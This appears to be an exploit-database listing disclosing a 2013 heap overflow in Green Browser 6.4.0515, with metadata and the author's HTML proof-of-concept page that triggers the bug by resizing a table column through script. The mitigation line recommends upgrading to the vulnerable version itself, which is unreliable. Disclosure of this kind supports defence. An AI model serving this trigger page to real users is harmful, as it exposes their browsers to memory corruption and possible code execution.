Green Browser 6.4.0515 Heap Overflow

vendor:

Green Browser

by:

The Black Devils 'Asesino04'

7,5

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: Green Browser

Affected Version From: 6.4.0515

Affected Version To: 6.4.0515

Patch Exists: YES

Related CWE: N/A

CPE: a:morequick:green_browser

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2013

Green Browser 6.4.0515 Heap Overflow

A heap overflow vulnerability exists in Green Browser 6.4.0515 when a maliciously crafted HTML page is opened. The vulnerability is triggered when a maliciously crafted HTML page is opened, which contains a table with a large width and span attributes. This causes a heap overflow, which can be exploited to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Green Browser 6.4.0515 or later.

Source

Exploit-DB raw data:

# Exploit Title: Green Browser 6.4.0515 Heap Overflow
# Date: 31-08-2013
# Exploit Author: The Black Devils "Asesino04"
# Vendor Homepage: http://www.morequick.com/indexen.htm
# Version: 6.4.0515
# Tested on: [ Windows XP SP2]



<html>
 <body>
 <table style="table-layout:fixed" >
        <col id="132" width="41" span="1" >  </col>
 </table>
 <script>
 
 function over_trigger() {
        var obj_col = document.getElementById("132");
        obj_col.width = "42765";
        obj_col.span = 1000;
 }
 
 setTimeout("over_trigger();",1);
 
 </script>
 </body>
 </html>
 
 # Contact :
#------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com